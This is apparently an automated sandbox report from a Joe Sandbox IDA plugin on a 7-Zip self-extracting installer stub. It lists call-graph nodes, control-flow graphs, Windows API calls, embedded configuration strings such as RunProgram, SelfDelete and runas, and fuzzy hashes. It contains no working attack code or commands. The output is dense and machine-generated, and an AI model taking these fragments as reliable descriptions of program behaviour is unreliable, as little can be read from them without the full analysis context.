9812->9814 9816 140014fb0 _RunAllParam ??3@YAXPEAX 9813->9816 9814->9808 9820 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9814->9820 9817 14000985e 9815->9817 9818 14000999b ??3@YAXPEAX ??3@YAXPEAX 9816->9818 9819 14000af54 36 API calls 9817->9819 9818->9566 9819->9804 9824 140009908 9820->9824 9821 140003a58 lstrcmpW 9821->9863 9822 14000962a ??3@YAXPEAX 9823 140009754 ??3@YAXPEAX 9822->9823 9825 140009765 9823->9825 9826 1400097e6 ??3@YAXPEAX 9823->9826 9831 14000722c 33 API calls 9824->9831 9828 140005e64 17 API calls 9825->9828 9826->9805 9827 140006290 ??2@YAPEAX_K ??3@YAXPEAX 9827->9863 9830 14000976a 9828->9830 9833 140006a14 ??2@YAPEAX_K ??3@YAXPEAX lstrcmpW ??3@YAXPEAX 9830->9833 9831->9808 9832 1400013d4 ??2@YAPEAX_K ??3@YAXPEAX 9832->9863 9836 14000979b SetCurrentDirectoryW 9833->9836 9834 14000594c 15 API calls 9834->9863 9835 140008fec ??3@YAXPEAX ??3@YAXPEAX GetFileAttributesW 9838 1400095c1 9835->9838 9858 140008fde 9835->9858 9839 140006a14 ??2@YAPEAX_K ??3@YAXPEAX lstrcmpW ??3@YAXPEAX 9836->9839 9837 140001548 ??2@YAPEAX_K ??3@YAXPEAX 9840 1400090eb ??3@YAXPEAX ??3@YAXPEAX 9837->9840 9841 1400095d6 9838->9841 9843 140003bb8 16 API calls 9838->9843 9842 1400097d1 9839->9842 9840->9863 9845 14000c7f4 70 API calls 9841->9845 9842->9826 9844 1400097da 9842->9844 9843->9841 9847 140003bb8 16 API calls 9844->9847 9846 1400095e2 ??3@YAXPEAX ??3@YAXPEAX ??3@YAXPEAX ??3@YAXPEAX ??3@YAXPEAX 9845->9846 9846->9657 9848 14000961c 9846->9848 9847->9826 9848->9657 9849 1400091e8 _wtol 9849->9863 9850 1400059d4 lstrlenW lstrlenW _wcsnicmp 9850->9863 9851 140005978 lstrlenW lstrlenW _wcsnicmp 9851->9863 9852 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9852->9863 9853 140002d94 ??2@YAPEAX_K ??3@YAXPEAX 9853->9863 9854 140006618 ??2@YAPEAX_K ??3@YAXPEAX 9854->9863 9855 140002d28 ??2@YAPEAX_K ??3@YAXPEAX 9855->9863 9856 14000972a ??3@YAXPEAX ??3@YAXPEAX ??3@YAXPEAX 9856->9823 9857 140009570 ??3@YAXPEAX ??3@YAXPEAX ??3@YAXPEAX ??3@YAXPEAX 9857->9863 9858->9835 9859 140006de4 32 API calls 9858->9859 9861 140009648 SetLastError 9858->9861 9858->9863 9859->9858 9860 14000622c ??2@YAPEAX_K ??3@YAXPEAX 9860->9863 9862 140009650 9861->9862 9865 14000c7f4 70 API calls 9862->9865 9863->9821 9863->9822 9863->9827 9863->9832 9863->9834 9863->9837 9863->9849 9863->9850 9863->9851 9863->9852 9863->9853 9863->9854 9863->9855 9863->9856 9863->9857 9863->9858 9863->9860 9864 1400015d4 ??2@YAPEAX_K ??3@YAXPEAX 9863->9864 9872 140009641 ??3@YAXPEAX 9863->9872 9873 140009533 ??3@YAXPEAX 9863->9873 9866 1400094f4 ??3@YAXPEAX ??3@YAXPEAX 9864->9866 9867 140009660 9865->9867 9868 140006c88 8 API calls 9866->9868 9869 140009675 7 API calls 9867->9869 9870 140009669 9867->9870 9868->9863 9869->9657 9871 140003bb8 16 API calls 9870->9871 9871->9869 9872->9862 9873->9863 9875 1400021c3 GetVersionExW 9874->9875 9876 14000217b SetTimer GetMessageW DispatchMessageW KillTimer DestroyWindow 9874->9876 9875->9564 9875->9565 9876->9875 9878 1400011aa ??2@YAPEAX_K 9877->9878 9879 1400011fd 9877->9879 9878->9879 9880 1400011d1 ??3@YAXPEAX 9878->9880 9879->9570 9880->9879 9883 140006631 9882->9883 9884 140006662 9882->9884 9885 14000665a 9883->9885 9905 140001548 9883->9905 9884->9885 9887 140001548 2 API calls 9884->9887 9888 140002d94 9885->9888 9887->9884 9890 140002db0 9888->9890 9889 140002e0e 9892 1400037a4 9889->9892 9890->9889 9891 140001190 2 API calls 9890->9891 9891->9889 9893 140001190 2 API calls 9892->9893 9900 1400037e0 9893->9900 9894 140003979 9895 140001190 2 API calls 9894->9895 9896 14000399c 9894->9896 9895->9896 9897 140001548 ??2@YAPEAX_K ??3@YAXPEAX 9897->9900 9900->9894 9900->9897 9901 140001190 ??2@YAPEAX_K ??3@YAXPEAX 9900->9901 9902 1400038dc ??3@YAXPEAX 9900->9902 9909 140002b70 9900->9909 9914 140003274 9900->9914 9901->9900 9920 140001440 9902->9920 9906 1400015ab 9905->9906 9907 14000156d 9905->9907 9906->9883 9908 140001190 2 API calls 9907->9908 9908->9906 9910 140002bc4 9909->9910 9911 140002b8a ??2@YAPEAX_K 9909->9911 9910->9900 9911->9910 9912 140002b9b ??3@YAXPEAX 9911->9912 9912->9910 9915 140001190 2 API calls 9914->9915 9916 1400032a7 9915->9916 9917 1400032ed 9916->9917 9918 1400032bf MultiByteToWideChar 9916->9918 9919 140001190 2 API calls 9916->9919 9917->9900 9918->9917 9919->9918 9921 1400014a1 ??3@YAXPEAX ??3@YAXPEAX 9920->9921 9922 140001465 9920->9922 9921->9900 9923 140001190 2 API calls 9922->9923 9923->9921 11966 140015194 11971 140014924 SetFilePointer 11966->11971 11970 1400151c5 11972 140014956 11971->11972 11973 14001494c GetLastError 11971->11973 11972->11970 11974 140014b08 11972->11974 11973->11972 11975 140014924 2 API calls 11974->11975 11976 140014b2a 11975->11976 11977 140014b30 11976->11977 11978 140014b3b SetEndOfFile 11976->11978 11977->11970 11978->11977 11255 14000b4b4 11273 14000ab64 11255->11273 11258 14000b4da GetSystemMetrics 11259 14000b4f0 11258->11259 11260 140002d28 2 API calls 11259->11260 11261 14000b4fe 11260->11261 11262 14000b518 11261->11262 11263 140002d94 2 API calls 11261->11263 11283 140009e30 SystemParametersInfoW 11262->11283 11263->11262 11267 1400021cc 4 API calls 11271 14000b557 11267->11271 11268 14000b5ac GetDlgItem 11269 1400021cc 4 API calls 11268->11269 11272 14000b5c8 ??3@YAXPEAX 11269->11272 11271->11268 11271->11272 11274 14000aba8 11273->11274 11275 14000ab90 GetSystemMetrics GetSystemMetrics 11273->11275 11292 140009fc0 GetDC 11274->11292 11275->11274 11277 140009e30 12 API calls 11278 14000abe5 GetDlgItem 11277->11278 11280 1400021cc 4 API calls 11278->11280 11281 14000ac12 GetSystemMetrics 11280->11281 11281->11258 11281->11259 11284 140009e74 11283->11284 11288 140009edd GetDlgItem 11283->11288 11285 140009e96 CreateFontIndirectW 11284->11285 11286 140009e8b GetSystemMetrics 11284->11286 11287 140009ea9 11285->11287 11285->11288 11286->11285 11291 140009fc0 8 API calls 11287->11291 11288->11267 11289 140009ec7 DeleteObject 11289->11288 11291->11289 11293 14000a097 11292->11293 11294 14000a000 GetSystemMetrics GetSystemMetrics GetSystemMetrics SelectObject DrawTextW 11292->11294 11293->11277 11295 14000a071 SelectObject ReleaseDC 11294->11295 11295->11293 10101 140009bc0 GetWindowLongPtrW 10102 140009bf7 10101->10102 10103 140009c2c 10101->10103 10104 140009c3d 10102->10104 10105 140009bff SetWindowLongPtrW SendMessageW 10102->10105 10107 140009c5c 10103->10107 10105->10103 10108 140009c9a 10107->10108 10109 140009c6a 10107->10109 10110 140009cb4 10108->10110 10111 140009ca6 UnhookWindowsHookEx 10108->10111 10112 140009c72 10109->10112 10113 140009c90 10109->10113 10114 140009cc0 UnhookWindowsHookEx 10110->10114 10115 140009c77 10110->10115 10111->10110 10112->10115 10118 140009d30 10112->10118 10124 14000c234 10113->10124 10114->10115 10115->10104 10119 140009d68 10118->10119 10120 140009d39 10118->10120 10119->10115 10121 140009d41 10120->10121 10122 140009d60 EndDialog 10120->10122 10121->10119 10123 140009d4b EndDialog 10121->10123 10122->10119 10123->10119 10127 14000be00 10124->10127 10128 14000bec6 10127->10128 10129 14000be3c 8 API calls 10127->10129 10130 14000bf58 GetDlgItem SetWindowTextW 10128->10130 10131 14000bed0 8 API calls 10128->10131 10129->10128 10199 14000585c 10130->10199 10131->10130 10133 14000bf82 10210 14000b384 10133->10210 10135 14000bf8e 10136 14000c036 10135->10136 10137 14000bf9a 10135->10137 10138 1400027a0 18 API calls 10136->10138 10139 14000c00a 10137->10139 10140 14000bf9f 10137->10140 10141 14000c040 10138->10141 10142 1400027a0 18 API calls 10139->10142 10143 14000bfd1 10140->10143 10144 14000bfa4 10140->10144 10146 14000ac40 25 API calls 10141->10146 10147 14000c014 10142->10147 10145 1400027a0 18 API calls 10143->10145 10148 14000c034 10144->10148 10154 1400027a0 18 API calls 10144->10154 10149 14000bfdb 10145->10149 10150 14000bfc7 10146->10150 10153 14000ac40 25 API calls 10147->10153 10151 14000c074 GetWindow 10148->10151 10152 14000c11e 10148->10152 10158 14000ac40 25 API calls 10149->10158 10164 1400027a0 18 API calls 10150->10164 10159 14000c08a 10151->10159 10157 14000c15b GetModuleHandleW 10152->10157 10176 14000c129 10152->10176 10155 14000c024 10153->10155 10156 14000bfb7 10154->10156 10160 140009f84 GetDlgItem ShowWindow 10155->10160 10161 14000ac40 25 API calls 10156->10161 10165 14000c169 LoadIconW 10157->10165 10163 14000bfeb 10158->10163 10162 14000c0a5 GetWindow 10159->10162 10172 14000585c 21 API calls 10159->10172 10160->10148 10161->10150 10166 14000c0e1 10162->10166 10167 14000c0b9 10162->10167 10168 140009f84 GetDlgItem ShowWindow 10163->10168 10169 14000c05a 10164->10169 10170 14000c177 GetDlgItem SendMessageW 10165->10170 10171 14000c1a0 10165->10171 10178 14000c0f6 GetWindow 10166->10178 10175 140003d9c 28 API calls 10167->10175 10192 14000c0d3 GetWindow 10167->10192 10177 14000bffb 10168->10177 10179 14000ac40 25 API calls 10169->10179 10180 14000c1b4 10170->10180 10173 140009f84 GetDlgItem ShowWindow 10171->10173 10174 14000c092 GetWindow 10172->10174 10173->10180 10174->10159 10175->10167 10176->10165 10176->10171 10183 140009d74 9 API calls 10177->10183 10184 14000c104 10178->10184 10194 14000c0e9 10178->10194 10179->10148 10181 14000c1c5 10180->10181 10182 14000c1bd 10180->10182 10198 14000ab64 19 API calls 10181->10198 10185 14000a5c4 LoadLibraryA GetProcAddress GetWindow 10182->10185 10186 14000c008 10183->10186 10188 14000c111 10184->10188 10189 14000c1da 10184->10189 10185->10181 10186->10148 10187 140002554 46 API calls 10187->10194 10190 14000a5c4 LoadLibraryA GetProcAddress GetWindow 10188->10190 10193 140009f08 GetParent GetWindowRect SetWindowPos 10189->10193 10195 14000c119 10190->10195 10191 14000c1cf 10197 14000a118 26 API calls 10191->10197 10192->10166 10192->10167 10196 14000c1e2 MessageBeep 10193->10196 10194->10178 10194->10187 10195->10189 10196->10115 10197->10189 10198->10191 10217 140003d18 10199->10217 10202 14000594c 15 API calls 10203 14000587c 10202->10203 10204 140002d28 2 API calls 10203->10204 10205 14000588d 10204->10205 10206 140002d28 2 API calls 10205->10206 10207 14000589e 10206->10207 10208 1400052d8 4 API calls 10207->10208 10209 1400058b2 ??3@YAXPEAX ??3@YAXPEAX SetWindowTextW ??3@YAXPEAX 10208->10209 10209->10133 10211 140001190 2 API calls 10210->10211 10213 14000b3b1 10211->10213 10212 14000b3da SetWindowTextW 10214 14000585c 21 API calls 10212->10214 10213->10212 10216 140001548 2 API calls 10213->10216 10215 14000b3f4 10214->10215 10216->10213 10218 140001190 2 API calls 10217->10218 10219 140003d48 GetWindowTextLengthW 10218->10219 10220 140003d84 10219->10220 10221 140003d58 10219->10221 10220->10202 10222 140003d6a GetWindowTextW 10221->10222 10223 140001190 2 API calls 10221->10223 10222->10220 10223->10222
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$Message$??2@ModuleTimerWindow_wtollstrlen$?_set_new_handler@@CommandCreateCurrentDestroyDirectoryDispatchFileHandleKillLineNameVersion
                                                                                                                                              • String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxtest$sfxversion$sfxwaitall$shc$waitall$x64$x86
                                                                                                                                              • API String ID: 3822079563-355865012
                                                                                                                                              • Opcode ID: 46ef39cd969ba5976e53c0cb014ec25a8db5c7cebc9a4efc430a62a2924277de
                                                                                                                                              • Instruction ID: 364cff9facd6a1ef06d97274886931cfaf483fd8fdce9875c59425905054aa79
                                                                                                                                              • Opcode Fuzzy Hash: 46ef39cd969ba5976e53c0cb014ec25a8db5c7cebc9a4efc430a62a2924277de
                                                                                                                                              • Instruction Fuzzy Hash: 7C135CB1604A8181EA73EB27F4517EA63A1F79D7C0F90801AFB8947AB6DF78C945C701

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$??2@CloseExecuteHandleObjectShellSingleWait
                                                                                                                                              • String ID: runas
                                                                                                                                              • API String ID: 228040680-4000483414
                                                                                                                                              • Opcode ID: 3a731313788833f03691b278ac7bbe15aae248554c4f3e2b317822e48f60b639
                                                                                                                                              • Instruction ID: 4df89d2247086e423a1a2ca1871fb215b82d858b141f0f69976dc0afbb36e867
                                                                                                                                              • Opcode Fuzzy Hash: 3a731313788833f03691b278ac7bbe15aae248554c4f3e2b317822e48f60b639
                                                                                                                                              • Instruction Fuzzy Hash: 0B415A72A18B8086E721DF12F0543AAB3A5F7D8BD0F544125FB8947AAACF7CC905CB40

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1272 1400029dc-140002a00 LoadLibraryA GetProcAddress 1273 140002a02-140002a0e GetNativeSystemInfo 1272->1273 1274 140002a10 1272->1274 1275 140002a12-140002a16 1273->1275 1274->1275
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                                                                                              • String ID: GetNativeSystemInfo$kernel32
                                                                                                                                              • API String ID: 2103483237-3846845290
                                                                                                                                              • Opcode ID: 848c9ad2a0d3476315f745f577a2e496412854036ef6c8f000bb78e7d03b0a2a
                                                                                                                                              • Instruction ID: 65ca20d525106fe96000ab002afe0e89e6d5026d20aa0b8d59282c99e5b88f06
                                                                                                                                              • Opcode Fuzzy Hash: 848c9ad2a0d3476315f745f577a2e496412854036ef6c8f000bb78e7d03b0a2a
                                                                                                                                              • Instruction Fuzzy Hash: 61E0EC70711941D2EB62DB92E8103E82361B7ECB90F900529B64E436B0EE3CCA9AC700
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3429775523-0
                                                                                                                                              • Opcode ID: 171a453e635968fb291f670e076b6eed2a7a82eb5d435e59b9e68e039cf5c816
                                                                                                                                              • Instruction ID: 04eb66c763905f339746e8f01cc633dd459bfeaff36aac37dec00845f41476e0
                                                                                                                                              • Opcode Fuzzy Hash: 171a453e635968fb291f670e076b6eed2a7a82eb5d435e59b9e68e039cf5c816
                                                                                                                                              • Instruction Fuzzy Hash: 171103B76096C0CBD7218F69E49478EBBA0F3A9784F94412AD78943715CB38C549CF15

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 792 14000be00-14000be36 793 14000bec6-14000beca 792->793 794 14000be3c-14000bec0 GetModuleHandleW LoadIconW GetSystemMetrics * 2 GetModuleHandleW LoadImageW SendMessageW * 2 792->794 795 14000bf58-14000bf94 GetDlgItem SetWindowTextW call 14000585c call 14000b384 793->795 796 14000bed0-14000bf52 GetDlgItem * 2 GetWindowLongPtrW SetWindowLongPtrW GetDlgItem * 2 GetWindowLongPtrW SetWindowLongPtrW 793->796 794->793 801 14000c036-14000c050 call 1400027a0 call 14000ac40 795->801 802 14000bf9a-14000bf9d 795->802 796->795 826 14000c055-14000c065 call 1400027a0 call 14000ac40 801->826 804 14000c00a-14000c02f call 1400027a0 call 14000ac40 call 140009f84 802->804 805 14000bf9f-14000bfa2 802->805 837 14000c034 804->837 808 14000bfd1-14000c008 call 1400027a0 call 14000ac40 call 140009f84 call 140009d74 805->808 809 14000bfa4-14000bfa7 805->809 813 14000c06a-14000c06e 808->813 809->813 814 14000bfad-14000bfcc call 1400027a0 call 14000ac40 809->814 817 14000c074-14000c088 GetWindow 813->817 818 14000c11e-14000c127 813->818 814->826 827 14000c09d-14000c0a3 817->827 823 14000c129-14000c12c 818->823 824 14000c15b-14000c166 GetModuleHandleW 818->824 832 14000c154-14000c159 823->832 833 14000c12e-14000c131 823->833 836 14000c169-14000c175 LoadIconW 824->836 826->813 830 14000c0a5-14000c0b7 GetWindow 827->830 831 14000c08a-14000c097 call 14000585c GetWindow 827->831 839 14000c0e1-14000c0e7 830->839 840 14000c0b9-14000c0c4 call 140003d9c 830->840 831->827 845 14000c142-14000c144 832->845 841 14000c133-14000c136 833->841 842 14000c14d-14000c152 833->842 846 14000c177-14000c19e GetDlgItem SendMessageW 836->846 847 14000c1a0-14000c1af call 140009f84 836->847 837->813 855 14000c0f6-14000c102 GetWindow 839->855 866 14000c0c6-14000c0cc 840->866 867 14000c0ce-14000c0d0 840->867 852 14000c146-14000c14b 841->852 853 14000c138-14000c13b 841->853 842->845 845->836 857 14000c1b4-14000c1bb 846->857 847->857 852->845 853->847 861 14000c13d 853->861 863 14000c104-14000c10b 855->863 864 14000c0e9-14000c0f3 call 140002554 855->864 858 14000c1c5-14000c1d6 call 14000ab64 call 14000a118 857->858 859 14000c1bd-14000c1c0 call 14000a5c4 857->859 871 14000c1da-14000c1dd call 140009f08 858->871 859->858 861->845 870 14000c111-14000c119 call 14000a5c4 863->870 863->871 864->855 874 14000c0d3-14000c0df GetWindow 866->874 867->874 870->871 878 14000c1e2-14000c1fc 871->878 874->839 874->840
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Item$MessageSend$LongText$??3@HandleLoadModule$IconMetricsSystem$ImageLengthShow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1297775559-0
                                                                                                                                              • Opcode ID: af33e4ae92b9cf0d477982a91027c0ae8eeb5a30d2f2007967fa946254e04aef
                                                                                                                                              • Instruction ID: 5e48947b78fbad6608c468343bf2ef6fe47797e912f91301bce18406bc7bd85c
                                                                                                                                              • Opcode Fuzzy Hash: af33e4ae92b9cf0d477982a91027c0ae8eeb5a30d2f2007967fa946254e04aef
                                                                                                                                              • Instruction Fuzzy Hash: E4B14EB571164186FB56EB63F8147EA2292A7CDFD4F184429BF0A4BBA6CE3CC9458340

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 881 140004188-1400041e5 call 140002b70 call 140002be4 886 140004711-14000471b ??3@YAXPEAX@Z 881->886 887 1400041eb-14000424d call 140001190 * 2 call 140002b70 881->887 888 14000471d-140004737 886->888 895 14000424f-140004255 887->895 896 140004283 895->896 897 140004257-14000425a 895->897 898 14000428a-1400042aa call 140003274 896->898 897->898 899 14000425c-14000425f 897->899 905 1400042ac-1400042cf call 140001190 898->905 906 1400042ef 898->906 899->898 901 140004261-140004263 899->901 901->898 903 140004265-140004268 901->903 903->898 904 14000426a-14000426d 903->904 904->898 907 14000426f-140004274 call 140002e44 904->907 916 1400042d2-1400042e4 905->916 909 1400042f4-14000430e ??3@YAXPEAX@Z * 2 906->909 915 140004279-140004281 907->915 912 140004314-140004331 call 140002be4 909->912 913 1400046e5 909->913 921 140004337-140004346 912->921 922 1400046c0-1400046c6 912->922 917 1400046e7-1400046fb call 140003630 ??3@YAXPEAX@Z 913->917 915->895 916->916 919 1400042e6-1400042ed 916->919 924 1400046fe-14000470f ??3@YAXPEAX@Z * 2 917->924 919->909 921->922 925 14000434c-140004369 call 140002be4 921->925 922->917 924->888 925->922 928 14000436f-14000437e 925->928 929 1400043bb-1400043d2 928->929 930 140004380-140004384 928->930 932 140004473-140004493 strncmp 929->932 930->922 931 14000438a-1400043b6 call 1400039e4 ??3@YAXPEAX@Z * 2 930->931 941 1400046a1-1400046b4 call 140002be4 931->941 933 140004495 932->933 934 140004450-14000446d strncmp 932->934 936 1400044c3-1400044d2 933->936 934->932 938 1400043d7-1400043da 934->938 939 1400044d4-1400044de 936->939 940 140004497-14000449a 936->940 938->922 942 1400043e0-1400043f3 938->942 945 1400044ea-14000450a call 140003274 939->945 946 1400044e0-1400044e3 939->946 940->939 943 14000449c-14000449e 940->943 941->886 958 1400046b6-1400046bb 941->958 942->945 947 1400043f9-1400043fc 942->947 948 1400044a9-1400044be call 140002e44 943->948 949 1400044a0-1400044a4 943->949 964 14000454b-14000457c ??3@YAXPEAX@Z call 1400037a4 lstrcmpW 945->964 965 14000450c-14000452a call 140001190 945->965 946->945 952 140004443 947->952 953 1400043fe-140004412 947->953 948->936 949->948 956 1400044a6 949->956 959 140004448-14000444d call 140002e44 952->959 954 140004414-140004417 953->954 955 140004440 953->955 961 140004419-14000441d 954->961 962 14000443c-14000443e 954->962 955->952 956->948 958->887 959->934 966 140004438-14000443a 961->966 967 14000441f-140004428 961->967 962->952 977 140004593-1400045a1 964->977 978 14000457e-14000458d call 140014d64 964->978 975 14000452f-140004542 965->975 966->952 971 140004434-140004436 967->971 972 14000442a-140004432 call 140002e44 967->972 971->959 972->952 975->975 979 140004544-140004547 975->979 982 1400045a3-1400045be lstrlenW wcsncmp 977->982 983 14000461c-140004635 call 140003714 977->983 978->977 989 1400046c8-1400046e3 call 140003630 ??3@YAXPEAX@Z 978->989 979->964 986 1400045c9-1400045cc 982->986 987 1400045c0-1400045c7 982->987 991 140004645-140004652 ??2@YAPEAX_K@Z 983->991 992 140004637-140004643 call 1400013d4 983->992 986->983 990 1400045ce-1400045db ??2@YAPEAX_K@Z 986->990 987->982 987->986 989->924 994 1400045f9 990->994 995 1400045dd-1400045f7 call 140003008 990->995 998 140004654-14000466e call 140003008 991->998 999 140004670 991->999 1009 14000468e-14000469e ??3@YAXPEAX@Z * 2 992->1009 996 1400045fc-14000461a call 140014f08 994->996 995->996 1012 140004688 996->1012 1005 140004672-140004684 call 140014f08 998->1005 999->1005 1005->1012 1009->941 1012->1009
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$??2@$strncmp$lstrcmplstrlenwcsncmp
                                                                                                                                              • String ID: SetEnvironment${\rtf
                                                                                                                                              • API String ID: 2284649278-318139784
                                                                                                                                              • Opcode ID: d3f0bae3b15ddb70ac41c41364de50817703f0d6b3af512f9fa55f4975e69db7
                                                                                                                                              • Instruction ID: 02f768bd035b1cdefbf6ba138714fc0b3efcafbbd2906dcd07267f19784650a6
                                                                                                                                              • Opcode Fuzzy Hash: d3f0bae3b15ddb70ac41c41364de50817703f0d6b3af512f9fa55f4975e69db7
                                                                                                                                              • Instruction Fuzzy Hash: 56F16DB2608A8086EB62DF17F4903EE67A5F789BC4F544016FB89077BADE39C445CB05

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
